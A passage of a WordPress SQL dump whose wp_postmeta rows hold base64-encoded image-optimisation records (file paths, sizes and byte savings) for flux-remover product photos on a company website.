zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLXNvbHZlbnQtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItc29sdmVudC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDM3LCJ0aW1lIjoxNDgzNTY2NjQ5LCJpZCI6MTY5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTIyNXgzNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLXNvbHZlbnQtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItc29sdmVudC0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NTMwLCJ0aW1lIjoxNDgzNTY2NjUyLCJpZCI6MTY5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLXNvbHZlbnQtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItc29sdmVudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTQ2LCJ0aW1lIjoxNDgzNTY2NjU2LCJpZCI6MTY5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTQ1MHgyODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLXNvbHZlbnQtNDUweDI4MC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItc29sdmVudC00NTB4MjgwLmpwZyIsInJlZHVjdGlvbiI6NjYyLCJ0aW1lIjoxNDgzNTY2NjU5LCJpZCI6MTY5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci1zb2x2ZW50LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItc29sdmVudC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQzMywidGltZSI6MTQ4MzU2NjY2NCwiaWQiOjE2OTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29314, 1696, 'wpfc_optimisation_reduction', '12028'); 
INSERT INTO `wp_postmeta` VALUES (29315, 1696, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLmpwZyIsIndpZHRoIjo1MDIzLCJoZWlnaHQiOjMzNDksIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjY2NjksImlkIjoiMTY5NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NDUsInRpbWUiOjE0ODM1NjY2NzIsImlkIjoxNjk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6OTg3LCJ0aW1lIjoxNDgzNTY2Njc2LCJpZCI6MTY5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjg5OCwidGltZSI6MTQ4MzU2NjY4MCwiaWQiOjE2OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjQ0MjQsInRpbWUiOjE0ODM1NjY2ODQsImlkIjoxNjk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTY2Njg4LCJpZCI6MTY5Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzNywidGltZSI6MTQ4MzU2NjY5MSwiaWQiOjE2OTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tZmx1eC1yZW1vdmVyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NDMsInRpbWUiOjE0ODM1NjY2OTQsImlkIjoxNjk2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODA4LCJ0aW1lIjoxNDgzNTY2Njk4LCJpZCI6MTY5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTA0LCJ0aW1lIjoxNDgzNTY2NzAxLCJpZCI6MTY5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6NjE3LCJ0aW1lIjoxNDgzNTY2NzA1LCJpZCI6MTY5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjY0LCJ0aW1lIjoxNDgzNTY2NzA4LCJpZCI6MTY5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzYwLCJ0aW1lIjoxNDgzNTY2NzEyLCJpZCI6MTY5Nn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci05MHg5MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1mbHV4LXJlbW92ZXItOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWZsdXgtcmVtb3Zlci05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjQ0OCwidGltZSI6MTQ4MzU2NjcxNiwiaWQiOjE2OTZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29316, 1694, 'wpfc_optimisation_reduction', '14430'); 
INSERT INTO `wp_postmeta` VALUES (29317, 1694, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLmpwZyIsIndpZHRoIjo1NjUyLCJoZWlnaHQiOjM2NzYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjY3MjEsImlkIjoiMTY5NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo2ODYsInRpbWUiOjE0ODM1NjY3MjQsImlkIjoxNjk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci04MDB4NTIwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTIwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci04MDB4NTIwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci04MDB4NTIwLmpwZyIsInJlZHVjdGlvbiI6MTI0NSwidGltZSI6MTQ4MzU2NjcyOCwiaWQiOjE2OTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTc2OHg0OTkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTc2OHg0OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTc2OHg0OTkuanBnIiwicmVkdWN0aW9uIjoxMTQ2LCJ0aW1lIjoxNDgzNTY2NzMyLCJpZCI6MTY5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItMTYwMHgxMDQxLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTE2MDB4MTA0MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy1mbHV4LXJlbW92ZXItMTYwMHgxMDQxLmpwZyIsInJlZHVjdGlvbiI6NTM5NCwidGltZSI6MTQ4MzU2NjczNiwiaWQiOjE2OTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtZmx1eC1yZW1vdmVyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTYsInRpbWUiOjE0ODM1NjY3NDAsImlkIjoxNjk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLWZsdXgtcmVtb3Zlci0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLm